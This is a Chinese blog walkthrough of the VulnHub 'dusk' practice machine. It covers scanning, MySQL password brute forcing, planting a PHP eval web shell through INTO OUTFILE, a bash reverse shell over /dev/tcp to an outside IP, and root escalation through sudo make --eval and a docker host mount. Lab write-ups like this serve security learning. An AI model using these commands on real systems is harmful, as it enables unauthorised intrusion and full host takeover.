[vulnhub]dusk

编程入门 行业动态 更新时间:2024-10-23 19:27:22

个人博客地址

darkerbox.

欢迎大家学习交流

靶机网址:

vulnhub./entry/sunset-dusk,404/

靶机知识点:

靶机IP:192.168.34.170
kali IP:192.168.34.69

信息收集

nmap -sS -sV -p- 0-65535 192.168.34.170


端口开的不少。扫扫目录

gobuster dir -u "192.168.34.170" -w /usr/share/wordlists/dirb/big.txt -x php

全是403。没东西。

访问8080端口看看,1.php.2.php.3.php是我做的时候写的。

这里也扫过目录了,也没东西。唯一有用的就是那个Location working 。网站目录在/var/tmp下面。这里也只能到这里了。

漏洞利用

上面扫端口发现有3306端口。爆破一下

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.34.170 mysql


密码为password

mysql远程登录

mysql -h 192.168.34.170 -u root -p
select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/4.php";

给/var/tmp下面写一句话木马。


打开bp抓包。准备弹shell

写好bash反弹shell

echo "bash -i >& /dev/tcp/192.168.34.80/6666 0>&1" | bash

进行url编码


这里有个知识点,看了个大哥的。1nsIght

想要清屏就执行下条命令,给TERM这个环境变量赋值screen,就可以清屏(clear)了。

export TERM=screen # 赋值xterm也可以

权限提升

sudo -l 


发现能以dusk用户执行三个命令。这里使用第二个。

make命令。

使用make命令前,我觉得有必要看一下make命令的用法和makefile文件的格式。make,makefile

即.makefile的格式必须如下图

此时我们看以下代码

$'x:\n\t'/bin/sh


这种格式就是makefile的格式。给大家再看一下没有$的区别

直接输出,并没有解析\n\t。

好了到了这里就可以继续了
payload:

sudo -u dusk make --eval=$'x:\n\t'/bin/sh

make的–eval参数,make将–eval的参数当做makefile语句执行。

执行

得到了dusk用户creds(凭证)

又get到了

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

简单说一下,上面的代码,配合下图:将容器外部的目录/挂载到容器内部/hostOS,应该就是/hostOS这个目录拥有和主机外部/相同的目录结构。-i -t 使用 -i 和 -t 参数进入容器的 shell。
chrisfosterelli/rootplease是一个docker image。需要联网下载到本地
registry.hub.docker./r/chrisfosterelli/rootplease

由于靶机连不上网,这里可能截不了图。我会自己搭建一个环境复现一下。写一篇博客。

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

更多推荐

vulnhub,dusk

本文发布于:2023-05-25 10:55:48,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/226623.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:vulnhub   dusk

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!